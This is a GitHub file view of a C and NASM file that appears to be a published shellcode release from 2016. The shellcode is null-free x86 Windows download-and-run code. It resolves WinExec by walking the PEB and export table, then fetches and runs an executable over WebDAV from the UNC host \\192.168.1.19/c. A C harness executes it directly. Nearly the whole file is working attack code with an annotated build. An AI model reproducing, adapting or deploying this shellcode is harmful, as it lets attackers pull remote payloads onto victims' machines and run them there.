FilesExpand file tree

 master

/

39519.c

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

144 lines (122 loc) · 5.74 KB

 master

/

39519.c

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

144 lines (122 loc) · 5.74 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

/*

* Author: Sean Dillon

* Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)

* Release Date: March 1, 2016

*

* Description: x86 Windows null-free download & run via WebDAV shellcode

* Assembled Size: 96 bytes

* Tested On: Windows XP, Windows 10

* License: http://opensource.org/licenses/MIT

*

* Build/Run: MSVC with /NXCOMPAT:NO in Propertes->Linker->Advanced->DEP

*/

/*

* NOTE: This C code connects to WebDAV at \\192.168.1.19:80/c to download and execute an .exe.

* The WinExec() API downloads and runs dirty files from UNC paths with the "WebClient" daemon.

* The end of this file contains the .nasm source code and instructions for building from that.

*/

#include <stdio.h>

#include <string.h>

char shellcode[] =

"\x6a\x30" /* push $0x30 */

"\x5e" /* pop %esi */

"\x64\xad" /* lods %fs:(%esi),%eax */

"\x8b\x40\x0c" /* mov 0xc(%eax),%eax */

"\x8b\x70\x0c" /* mov 0xc(%eax),%esi */

"\xad" /* lods %ds:(%esi),%eax */

"\x8b\x10" /* mov (%eax),%edx */

"\x8b\x5a\x18" /* mov 0x18(%edx),%ebx */

"\x89\xd9" /* mov %ebx,%ecx */

"\x03\x49\x3c" /* add 0x3c(%ecx),%ecx */

"\x8b\x49\x78" /* mov 0x78(%ecx),%ecx */

"\x01\xd9" /* add %ebx,%ecx */

"\x8b\x41\x20" /* mov 0x20(%ecx),%eax */

"\x01\xd8" /* add %ebx,%eax */

"\x31\xd2" /* xor %edx,%edx */

"\x52" /* push %edx */

"\x5f" /* pop %edi */

"\x8b\x34\x90" /* mov (%eax,%edx,4),%esi */

"\x01\xde" /* add %ebx,%esi */

"\x42" /* inc %edx */

"\x81\x3e\x57\x69\x6e\x45" /* cmpl $0x456e6957,(%esi) */

"\x75\xf2" /* jne 24 <find_winexec> */

"\x8b\x71\x24" /* mov 0x24(%ecx),%esi */

"\x01\xde" /* add %ebx,%esi */

"\x66\x8b\x14\x56" /* mov (%esi,%edx,2),%dx */

"\x8b\x71\x1c" /* mov 0x1c(%ecx),%esi */

"\x01\xde" /* add %ebx,%esi */

"\x8b\x74\x96\xfc" /* mov -0x4(%esi,%edx,4),%esi */

"\x01\xde" /* add %ebx,%esi */

"\x57" /* push %edi */

"\x68\x31\x39\x2f\x63" /* push $0x632f3931 */

"\x68\x38\x2e\x31\x2e" /* push $0x2e312e38 */

"\x68\x32\x2e\x31\x36" /* push $0x36312e32 */

"\x68\x5c\x5c\x31\x39" /* push $0x39315c5c */

"\x54" /* push %esp */

"\xff\xd6" /* call *%esi */

"\xeb\xfe"; /* jmp 5e <spin> */

int main()

{

printf("Shellcode length: %d\n", (int)strlen(shellcode));

(*(void(*)(void))&shellcode)();

return 0;

}

/* --------------------------------------------------------------------------------------

* Author: Sean Dillon

* Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)

* Release Date: March 1, 2016

*

* Description: x86 Windows null-free download & run via WebDAV shellcode

* Assembled Size: 96 bytes

* Tested On: Windows XP, Windows 10

* License: http://opensource.org/licenses/MIT

;

; Build/Run: nasm -o webdav.o webdav.nasm

; ld -o webdav webdav.o

; objdump -d webdav

BITS 32

global _start

section .text

push 0x30 ; PEB offset

pop esi

db 0x64 ; dword ptr fs : []

lodsd ; eax = NtCurrentTeb()->ProcessEnvironmentBlock

mov eax, [eax + 0x0c] ; eax = PEB->Ldr

mov esi, [eax + 0x0c] ; eax = PEB->Ldr.InLoadOrder

lodsd

mov edx, [eax]

mov ebx, [edx + 0x18] ; ebx = GetModuleHandle(L"kernel32.dll")

mov ecx, ebx ; ecx = (IMAGE_DOS_HEADERS *)ebx

add ecx, [ecx + 0x3c] ; ecx = ecx->e_lfanew

mov ecx, [ecx + 0x78] ; ecx = ecx->OptionalHeader.DataDirectory[0].VirtualAddress

add ecx, ebx ; ecx = IMAGE_EXPORT_DIRECTORY

mov eax, [ecx + 0x20] ; eax = ecx->AddressOfNames

add eax, ebx

xor edx, edx ; edx = 0

push edx

pop edi ; edi = 0

find_winexec:

mov esi, [eax + edx * 4] ; esi = ExportNamePointerTable[edx]

add esi, ebx

inc edx ; ++edx

cmp dword [esi], 0x456e6957 ; if (memcmp(esi, "WinE", 4) != 0)

jne find_winexec ; goto find_winexec

mov esi, [ecx + 0x24] ; esi = ecx->AddressOfNameOrdinals

add esi, ebx

mov dx, [esi + edx * 2] ; dx = ExportOrdinalTable[edx]

mov esi, [ecx + 0x1c] ; esi = ecx->AddressOfFunctions

add esi, ebx ;

mov esi, [esi + edx * 4 - 4] ; esi = &WinExec()

add esi, ebx

push edi ; '\0'

push 0x632f3931

push 0x2e312e38

push 0x36312e32

push 0x39315c5c

push esp ; ss = \\192.168.1.19/c

; Python2 one-liner to generate host string stack pushes

; "0x"+"\n0x".join(map(''.join, zip(*[iter('\\\\192.168.1.19/c'[::-1].encode('hex'))]*8)))

call esi

spin: ; loop forever, downloaded process has taken over

jmp spin ; second stage can clean up

;--------------------------------------------------------------------------------------*/